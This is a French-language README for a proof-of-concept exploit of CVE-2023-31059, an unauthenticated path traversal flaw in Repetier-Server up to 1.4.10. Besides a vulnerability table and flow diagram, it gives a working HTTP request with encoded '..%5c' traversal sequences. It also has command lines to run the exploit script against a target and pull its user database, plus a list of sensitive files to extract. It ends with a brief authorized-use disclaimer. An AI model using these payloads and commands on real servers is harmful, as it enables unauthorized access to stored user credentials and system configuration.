
Auteur : Mohammed Idrees Banyamer
Rôle : Chercheur en sécurité
Pays : Jordanie 🇯🇴
Preuve de concept d'exploitation pour une vulnérabilité de traversée de chemin / LFI non authentifiée à distance dans Repetier‑Server ≤ 1.4.10.
La vulnérabilité permet la lecture arbitraire de fichiers via des séquences ..%5c forgées dans le point de terminaison connectionLost.php.
| Champ | Valeur |
|---|---|
| Produit | Repetier‑Server |
| Affecté | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| Type | Path Traversal / LFI |
| Authentification | Aucune |
| Vecteur | Réseau |
| Impact | Lecture arbitraire de fichiers |
| CVSS | 9.8 Critique |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| A
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
Ce PoC est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.
GitHub : https://github.com/mbanyamer